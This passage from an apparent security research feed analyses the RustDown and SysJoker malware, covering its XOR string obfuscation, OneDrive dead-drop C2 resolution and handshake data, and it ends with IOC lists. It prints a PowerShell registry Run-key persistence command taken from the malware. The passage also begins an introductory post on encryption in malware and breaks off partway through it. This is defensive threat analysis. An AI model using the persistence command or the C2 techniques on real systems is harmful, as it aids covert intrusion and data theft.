&lt;a href="#obfuscation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;As mentioned, the malware encrypts its own strings in two different ways. The
bulk of the remaining unobfuscated strings are artifacts of the static
compilation of Rust dependencies linked within the binary:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;base64-0.13&lt;/li&gt;
&lt;li&gt;curl-0.4.35&lt;/li&gt;
&lt;li&gt;rand-0.8.3&lt;/li&gt;
&lt;li&gt;rand_chacha-0.3.0&lt;/li&gt;
&lt;li&gt;rand_core-0.6.2&lt;/li&gt;
&lt;li&gt;rustc-demangle-0.1.21&lt;/li&gt;
&lt;li&gt;serde_json-1.0.64&lt;/li&gt;
&lt;li&gt;whoami-1.1.1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The first type of obfuscation has the following scheme: first, decode the
string with a standard Base64 scheme, unlike the first variant of SysJoker, and
then decrypt the result with the following XOR key:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The same XOR key was used by the DMAdevice variant of SysJoker.&lt;/p&gt;
&lt;p&gt;The malware decrypts additional strings using a XOR cipher, where each string
is processed against a distinct key stream. The specific key for each string is
determined by using fixed offsets from a table embedded within the malware’s
code, combined with a calculation involving hardcoded numerical values and
bitwise operations.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig7.png" title="Decryption of strings using unique key stream." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decryption of strings using unique key stream.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Communication With the C2&lt;span class="hx:absolute hx:-mt-20" id="communication-with-the-c2"&gt;&lt;/span&gt;
&lt;a href="#communication-with-the-c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The communication with the C2 starts with the decoding of a
&lt;a href="https://attack.mitre.org/techniques/T1102/001/"target="_blank" rel="noopener"&gt;dead drop resolver&lt;/a&gt;. This is
performed using the first decoding method and the hardcoded XOR key and Base64.
The backdoor sends an HTTP Get request to the following resolved URL:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;https://onedrive[.]live.com/download?resid=16E2AEE4B7A8BBB1%21112&amp;amp;authkey=!AED7TeCJaC7JNVQ&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The backdoor uses a custom user agent. This is similar to the earlier version
of SysJoker, which also communicated using a specific, hardcoded user agent:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;We were able to get a response from the resolver:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ&amp;#43;ZnUNcwdld2Mr&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The response is encoded using Base64 and XOR-ed with the same key that was used
in the previous step. The decrypted result is the IP address of the C2:
&lt;code&gt;{&amp;quot;url&amp;quot;:&amp;quot;http://85.31.231[.]49:443″}&lt;/code&gt;. During our investigation, we did not
find other C2 domains that were served by this OneDrive link.&lt;/p&gt;
&lt;p&gt;Next, the malware communicates with the C2 using the HTTP protocol. The URL is
formatted in the following way: &lt;code&gt;&amp;lt;C2 domain&amp;gt;/api/&amp;lt;command&amp;gt;&lt;/code&gt;. In RustDown, we
identified two commands attach and req.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/11/wildcard-evolution-of-sysjoker-cyber-threat/images/fig8.png" title="VirusTotal behavior analysis of RustDown showing the connection method to the C2." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;VirusTotal behavior analysis of RustDown showing the connection method to the C2.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Like the original version of Sysjoker, the RustDown will decode the C2 and send
the collected user’s information to the C2’s &lt;code&gt;/api/attach&lt;/code&gt; path as an initial
handshake. The information sent over has the following structure:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;ip&amp;#34;:&amp;#34;[Local IP Address]&amp;#34;
&amp;#34;serial&amp;#34;:&amp;#34;[Host Name]_[Serial Number]_[Username]&amp;#34;
&amp;#34;name&amp;#34;:&amp;#34;[Username]&amp;#34;
&amp;#34;os&amp;#34;:&amp;#34;[Operating System Version]&amp;#34;
&amp;#34;user_token&amp;#34;:&amp;#34;[User Token]&amp;#34;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;This differs from the fields used in SysJoker which included an unused ‘av’
field.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;&amp;#34;sn&amp;#34;: &amp;#34;[Serial Number]&amp;#34;
&amp;#34;us&amp;#34;: &amp;#34;[Username]&amp;#34;
&amp;#34;os&amp;#34;: &amp;#34;[Operating System Version]&amp;#34;
&amp;#34;av&amp;#34;: *Unused
&amp;#34;ip&amp;#34;: &amp;#34;[Local IP Address]&amp;#34;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;RustDown will send requests to the C2’s &lt;code&gt;/api/req&lt;/code&gt; path after registration,
similar to older versions. The response from the C2 is a JSON detailing an
array of tasks to perform. These instructions include actions along with
specific URLs to download a zip archive containing executables and save it at
&lt;code&gt;C:\ProgramData\php-Win32-lib&lt;/code&gt; with the filename specified in the JSON. To
unzip the payload, RustDown decryptes another PowerShell command.&lt;/p&gt;
&lt;h2&gt;Connections to Operation ElectricPowder&lt;span class="hx:absolute hx:-mt-20" id="connections-to-operation-electricpowder"&gt;&lt;/span&gt;
&lt;a href="#connections-to-operation-electricpowder" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In the process of our investigation, we found an interesting set of connections
between the newer SysJoker variants (particularly the ‘DMA Device’) and
components of &lt;a href="https://www.clearskysec.com/iec/"target="_blank" rel="noopener"&gt;Operation ElectricPowder&lt;/a&gt;. The
latter was an attack that targeted the Israeli Electric Corporation (IEC) in
2016-2017. In both cases, the following specific string is deobfuscated during
execution and used to establish persistence.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34; -Command \&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$reg&lt;/span&gt;&lt;span class="p"&gt;=[&lt;/span&gt;&lt;span class="no"&gt;WMIClass&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;ROOT\\DEFAULT:StdRegProv&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;$results&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$reg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;SetStringValue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;amp;H80000001&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Software\\Microsoft\\Windows\\CurrentVersion\\Run&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;process&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;,&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The general mechanism to resolve the Current User hive is described
&lt;a href="https://tfl09.blogspot.com/2011/09/using-powershell-and-wmi-to-manage.html"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.
However, the way the command string is implemented appears to be limited to
these malware sets, suggesting a developmental connection across nearly four
years.&lt;/p&gt;
&lt;p&gt;Additionally, once we discovered RustDown, we found that it also dynamically
resolves this PowerShell command string and uses it to achieve persistence.
This further strengthens the hypothesis that Operation ElectricPowder may have
been the earliest appearance of the WildCard threat actor.&lt;/p&gt;
&lt;h2&gt;Infection vectors&lt;span class="hx:absolute hx:-mt-20" id="infection-vectors"&gt;&lt;/span&gt;
&lt;a href="#infection-vectors" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In our publication of SysJoker, we suspected that the threat actors used an
infected npm package to deliver SysJoker. With the discovery of new versions,
we see that this pattern of masquerading as legitimate software continues among
all of the components of WildCard.&lt;/p&gt;
&lt;p&gt;Now with the DMAdevice, AppMessagingRegistrar variant, and Rustdown, we see a
pattern of using legitimate services to masquerade the malware. We can assume
WildCard uses phishing campaigns to convince victims to download their malware.&lt;/p&gt;
&lt;p&gt;As mentioned, part of WildCard’s operations share behavioral patterns with
Operation ElectricPowder. This malware also masqueraded as legitimate software
and used an elaborate and diverse phishing campaign, including decoy news sites
and Facebook profiles.&lt;/p&gt;
&lt;p&gt;If the connection between the two operations is solid, it supports WildCard’s
investment in extensive social engineering campaigns to reach their targets.
The early malware of Operation Electric Powder was poorly disguised as
legitimate Microsoft components. SysJoker variants were more elaborately
disguised as benign applications or web development components with names
reminiscent of TypeScript projects. The newest iteration follows in that web
development tool theme by disguising RustDown as a PHP CGI component. At this
time, we have not discovered the latest infection vector but feel that these
TTPs suggest possible targeting of developer communities in Israel with
trojanized applications.&lt;/p&gt;
&lt;p&gt;The detection of SysJoker traces back to a 2021 incident at an Israeli
educational institution. After analyzing the malware, we identified behavioral
patterns akin to those of another malware variant that previously targeted
Israeli infrastructure. This similarity points to a deliberate pattern of
victim targeting shared between the two types of malware.&lt;/p&gt;
&lt;h2&gt;Network infrastructure&lt;span class="hx:absolute hx:-mt-20" id="network-infrastructure"&gt;&lt;/span&gt;
&lt;a href="#network-infrastructure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Another interesting TTP connecting different WildCard operations is the abuse
of benign web services as dead drop resolvers or C2 hosting. First-stage
components consistently reach out to services like GDrive or OneDrive to
receive text that is decoded into the address of the intended C2. The threat
actor has used a number of hosting providers to host their C2 infrastructure,
most recently Hostinger. During analysis, we found that the C2 is possibly
geofenced to respond only to IP addresses from Israel, further supporting our
sense of WildCard’s targeting.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;As we continue to monitor the threat landscape surrounding the ongoing
Israeli-Hamas war, it’s important to emphasize the existence of non-traditional
threat actors like WildCard that have slipped below the radar. At the time of
our initial discovery of SysJoker, we were missing the necessary components to
bring this threat actor into view fully. As additional variants were
discovered, we found connections to a notable earlier campaign targeting
electric power generation in Israel. More recently, the WildCard developers
have undertaken the popular move from C++ to Rust. Despite having to start
their project over in Rust, RustDown also shows the same specific traits as
newer SysJoker variants and older ElectricPowder components. Clustering these
different sets of activities showcases an APT group consistently targeting
Israeli critical sectors like education, IT infrastructure, and possibly
electric power generation active to this day.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I would like to extend my sincere gratitude to Juan Andres Guerrero-Saade and
Ryan Robinson for their contributions to the development and refinement of this
blog.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Rustdown&lt;span class="hx:absolute hx:-mt-20" id="rustdown"&gt;&lt;/span&gt;
&lt;a href="#rustdown" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;DMAdevice (SysJoker May 2022 Variant)&lt;span class="hx:absolute hx:-mt-20" id="dmadevice-sysjoker-may-2022-variant"&gt;&lt;/span&gt;
&lt;a href="#dmadevice-sysjoker-may-2022-variant" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;AppMessagingRegistrar (SysJoker June 2022 Variant)&lt;span class="hx:absolute hx:-mt-20" id="appmessagingregistrar-sysjoker-june-2022-variant"&gt;&lt;/span&gt;
&lt;a href="#appmessagingregistrar-sysjoker-june-2022-variant" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;SysJoker Downloader&lt;span class="hx:absolute hx:-mt-20" id="sysjoker-downloader"&gt;&lt;/span&gt;
&lt;a href="#sysjoker-downloader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Dead Drop Resolver URL&lt;span class="hx:absolute hx:-mt-20" id="dead-drop-resolver-url"&gt;&lt;/span&gt;
&lt;a href="#dead-drop-resolver-url" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&amp;amp;authkey=!AED7TeCJaC7JNVQ&lt;/code&gt;
(RustDown)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&amp;amp;resid=F6A7DCE38A4B8570%21115&amp;amp;authkey=AKcf8zLcDneJZHw&lt;/code&gt;
(DMAdevice.exe)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://onedrive[.]live.com/download?cid=3014636895E3FE3B&amp;amp;resid=3014636895E3FE3B%21106&amp;amp;authkey=AD4OGrVz9h17Jzo&lt;/code&gt;
(AppMessagingRegistrar.exe)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;C2&lt;span class="hx:absolute hx:-mt-20" id="c2"&gt;&lt;/span&gt;
&lt;a href="#c2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;ul&gt;
&lt;li&gt;&lt;code&gt;85.31.231[.]49:443&lt;/code&gt; (Rustdown)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sharing-u-file[.]com&lt;/code&gt; (DMAdevice.exe)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;audiosound-visual[.]com&lt;/code&gt; (AppMessagingRegistrar.exe)filestorage-short[.]org
(SysJoker Downloader)&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Malware Reverse Engineering – Unraveling the Secrets of Encryption in Malware</title><link>https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/</link><pubDate>Mon, 07 Aug 2023 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/</guid><description>
&lt;p&gt;Encryption is everywhere in our lives. You might not notice it, but you use it
every single day. It is baked into even the most basic processes of our digital
world. Every time you open a website, send a message, unlock your phone, or pay
for your morning latte, you are using encryption as part of that process.
Encryption has evolved over centuries to become the cornerstone of modern data
security.&lt;/p&gt;
&lt;p&gt;However, encryption can have a dark side. Threat actors can also leverage the
power of encryption as part of their malicious operations. Encryption is
commonplace in malware for many reasons, such as obfuscating configurations,
hiding stolen data, scrambling communications, and holding users&amp;rsquo; files for
ransom. This blog will delve into the world of encryption and malware and how
to detect and protect yourself and your organizations.&lt;/p&gt;
&lt;h2&gt;Fundamentals&lt;span class="hx:absolute hx:-mt-20" id="fundamentals"&gt;&lt;/span&gt;
&lt;a href="#fundamentals" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;So, what is encryption? Encryption is the process of modifying data to conceal
its true meaning from any unauthorized entity.&lt;/p&gt;
&lt;p&gt;This involves converting the original data, commonly known as plaintext, into
unreadable data, commonly known as ciphertext. The process used is an algorithm
incorporating a key that is used to scramble up the original data so much that
it is incredibly difficult, or in some cases nearly impossible to decipher,
without having the key to use for decryption. In modern encryption, the
encryption algorithms are widely known, with only the key being secret between
the authorized parties. This is in contrast to many cases of historic
encryption, of which much were dependent on the algorithm not being known to
unauthorized parties. The most important encryption components are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plaintext: The original, unencrypted data. Often called the message&lt;/li&gt;
&lt;li&gt;Ciphertext: The scrambled, encrypted data. Produced using the encryption
algorithm and key on the plaintext. The ciphertext is converted back into
plaintext through the process of decryption&lt;/li&gt;
&lt;li&gt;Encryption Algorithm: The algorithm is the process or steps that are taken to
scramble up the plaintext. There is a wide range of algorithms that can be
used, with varying degrees of strength and complexity. The algorithm can be
something as simple as a substitution cipher, up to complex mathematical
algorithms like Advanced Encryption Standard (AES)&lt;/li&gt;
&lt;li&gt;Key: A piece of information that is used with the algorithm to encrypt and
decrypt data. A key can take many forms, such as a password, a series of
numbers, or a random string of bits&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Encryption and Cryptography, in general, have been around for a long time, even
having been used by historical figures to protect their sensitive messages such
as &lt;a href="https://en.wikipedia.org/wiki/Caesar_cipher"target="_blank" rel="noopener"&gt;Julius Caesar&lt;/a&gt; and Mary, Queen
of Scots, who used an elaborate substitution cipher. Mary&amp;rsquo;s cipher, although
intricate, was still able to be cracked with relative ease through frequency
analysis. With the messages being decrypted, this uncovered a
&lt;a href="https://en.wikipedia.org/wiki/Babington_Plot"target="_blank" rel="noopener"&gt;plot to assassinate Queen Elizabeth I&lt;/a&gt;.
Mary, along with her co-conspirators, was executed! Think of the consequences
the next time you decide to use a weak cipher for your secret messages!&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig1.jpg" title="Part of the cipher used by Mary, Queen of Scots (https://www.nationalarchives.gov.uk/education/resources/elizabeth-monarchy/ciphers-used-by-mary-queen-of-scots/)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Part of the cipher used by Mary, Queen of Scots (https://www.nationalarchives.gov.uk/education/resources/elizabeth-monarchy/ciphers-used-by-mary-queen-of-scots/)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Fast forwarding to the modern era, with the development of technology, the
complexity and speed of encryption have exploded. The information age has
allowed encryption to be handled at the speed of computers. In the following
sections, we will introduce you to different types of encryption and how they
fit into the world of malware. First, we will introduce the main building block
of encryption in modern cryptography. That is the XOR (exclusive OR) logical
operation. XOR is used in most of the encryption algorithms that are used in
information security today, both symmetric and asymmetric.&lt;/p&gt;
&lt;h2&gt;XOR and Rolling XOR Encryption&lt;span class="hx:absolute hx:-mt-20" id="xor-and-rolling-xor-encryption"&gt;&lt;/span&gt;
&lt;a href="#xor-and-rolling-xor-encryption" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;XOR (exclusive OR) is a logical operation that takes two binary inputs and
produces an output based on the following rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If both inputs are the same (either both 0 or both 1), the output is 0.&lt;/li&gt;
&lt;li&gt;If the inputs are different (one is 0, and the other is 1), the output is 1.&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;A ^ B = C&lt;/code&gt; than &lt;code&gt;A ^ C = B&lt;/code&gt; and &lt;code&gt;B ^ C = A&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;This means that XORing the output with one of the inputs returns the other
input, making it a two-way function.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2023/08/unraveling-malware-encryption-secrets/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;In XOR encryption, each plaintext byte is combined with a corresponding byte or
character from a secret key using the XOR operation. The resulting ciphertext
is the encrypted form of the plaintext. Since the encryption is a two-way
function meaning that to decrypt the ciphertext, all you have to do is XOR it
with the same secret key.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
